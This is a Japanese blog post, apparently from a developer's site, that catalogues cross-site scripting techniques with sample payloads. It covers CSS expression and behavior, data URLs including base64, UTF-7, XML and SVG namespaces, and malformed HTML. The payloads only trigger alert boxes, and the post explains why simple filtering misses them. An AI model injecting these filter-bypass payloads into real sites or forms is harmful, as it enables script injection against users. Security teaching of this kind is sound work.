無料で使えるシステムトレードフレームワーク「Jiji」
をリリースしました!
・OANDA Trade APIを利用した、オープンソースのシステムトレードフレームワークです。
・自分だけの取引アルゴリズムで、誰でも、いますぐ、かんたんに、自動取引を開始できます。
・OANDA Trade APIを利用した、オープンソースのシステムトレードフレームワークです。
・自分だけの取引アルゴリズムで、誰でも、いますぐ、かんたんに、自動取引を開始できます。
この広告は、90日以上更新していないブログに表示しています。
XSSの攻撃手法いろいろ
html5securityのサイトに、XSSの各種攻撃手法がまとめられているのを発見せり!ということで、個人的に「お!」と思った攻撃をサンプルつきでご紹介します。
1.CSS Expression
IE7以前には「CSS Expressions」という拡張機能があり、CSS内でJavaScriptを実行できたりします。
<divstyle="color:expression(alert('XSS'));">a</div>
@IT -[柔軟すぎる]IEのCSS解釈で起こるXSSで詳しく解説されていますが、CSSの解釈が柔軟なことともあいまって自前で無害化するのはなかなか困難。以下のようなコードでもスクリプトが実行されてしまいます。
<divstyle="color:expr/* コメントの挿入 */ession(alert('XSS'));">a</div>
<divstyle="color:expression(alert('XSS'));">a</div><divstyle="color:\0065xpression(alert('XSS2'));">b</div>
似たような話で「behavior」を使う攻撃もあります。こちらは指定したJScriptを実行できるとのこと。
<divstyle='behavior:url(test.sct)'>a</div>
2. data URL
URLにデータを埋め込む「data URL」スキームを利用して、iframeやobjectに攻撃用スクリプトをロードさせる手法。
<iframesrc="data:text/html,<script>alert('XSS')</script>"></iframe><objectdata="data:text/html,<script>alert('XSS2')</script>"></object>
base64でエンコードしたデータも指定でき、この場合単純な文字列探索(「script」タグを探すとか)では攻撃を検知できません。data URL自体を拒否する対処が必要です。
<iframesrc='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='></iframe
3.UTF-7
というものです。詳細はITPro - UTF-7とクロスサイト・スクリプティングを参照。
<metahttp-equiv="Content-Type"content="text/html; charset=UTF-7"/>+ADw-script+AD4-alert('XSS')+ADsAPA-/script+AD4-
4.XML + ネームスペース
XMLでもxhtmlのネームスペースが付与されているとFireFoxではxhtmlと解釈され、スクリプトが実行されます。
<?xml version="1.0" encoding="UTF-8"?><test><bodyxmlns="http://www.w3.org/1999/xhtml"onload="alert('XSS');"></body></test>
確認
XMLだからといって安心しては危険。また、同様に、SVGでもスクリプトが実行できたりします。
<?xml version="1.0" encoding="UTF-8"?><svgxmlns='http://www.w3.org/2000/svg'><gonload="#"http://unageanu.sakura.ne.jp/blog-samples/2010/0619/xml-2.svg">確認
5. HTMLの解釈関連
あとは、HTMLの構造が不正だけど、ブラウザの解釈によってスクリプトが実行されるよー、というたぐいのものを3つほど。
<b>aaaa<script<b></b><alert('XSS')</script </b>
<b<script>alert('XSS')</script>0
<style><imgsrc='</style><imgsrc=x onerror=alert("XSS")//'>
・・・
紹介は以上。私が無知なだけかもですが、いろいろとありますなー。
プロフィール
作ったもの
- Jiji
- 無料で使えるシステムトレードフレームワーク
- すぐねこ
- 3秒でこねこに会える、シンプル猫画像ビューア
- container-js
- JavaScriptで使えるDependency injection コンテナ
チュートリアル↓
「React.js + Webpack + ContainerJS でToDoリストを作ってみた」
「Knockout + ContainerJS でテスタブルにToDoリストを作るチュートリアル」
- javaclass
- java class file parser for ruby.
検索
カテゴリー
- SQL (11)
- 成果報告 (28)
- Docker (2)
- jiji (51)
- Ruby (310)
- R (12)
- 機械学習手習い (12)
- JavaScript (176)
- Android (1)
- PostgreSQL (9)
- CSS (21)
- Java (197)
- Subversion (4)
- SWT (1)
- Guice (10)
- ActiveRecord (1)
- FreeMarker (1)
- YAML (1)
- Flex (62)
- Yahoo! UI Library (28)
- prototype.js (8)
- Google Map (3)
- 雑記 (30)
- DIコンテナ (8)
- Axis (1)
- JavaDoc (1)
- Ant (4)
- gonzui (3)
- C++ (16)
- ASTRA (1)
- Tomcat (1)
- Seasar2 (1)
- Javassist (1)
- Adobe Share API (3)
- iPod touch (4)
- Generics (6)
- Jbehave (1)
- GMOインターネット証券WebService (13)
- Erlang (15)
- ContainerJS (7)
- Reversi (5)
- Ext (3)
- Linux (5)
- 情報セキュリティ (60)
- PC (1)
- シェルスクリプト (8)
- はてな (3)
- Tool (28)
- Cygwin (4)
- クラス解析機 (14)
- Scala (54)
- trac (1)
- Maven (9)
- DB2 (7)
- Git (5)
- クリック証券Webサービス (1)
- HTML (10)
- 本 (3)
- Needle (4)
- Apache (2)
- tweener (2)
- SQL Server (4)
- ClickClient (10)
- Share Point Server (4)
- Power Shell (18)
- クリック証券スクレイピング (19)
- バッチスクリプト (1)
- Oracle (1)
- Ivy (8)
- Gem (1)
- VirtualBox (1)
- Windows (2)
- Sinatra (4)
- Google App Engine (15)
- JSSpec (3)
- ネタ (1)
- jQuery (11)
- Fireworks (1)
- RMagick (7)
- SBI証券スクレイピング (9)
- Velocity (3)
- bash (2)
- SASS (9)
- RSpec (4)
- sh (5)
- OpenSTA (2)
- VMware (1)
- Yahoo! Developer API (2)
- CouchDB (3)
- jabsorb (2)
- Perl (1)
- Papervision3D (3)
- rake (1)
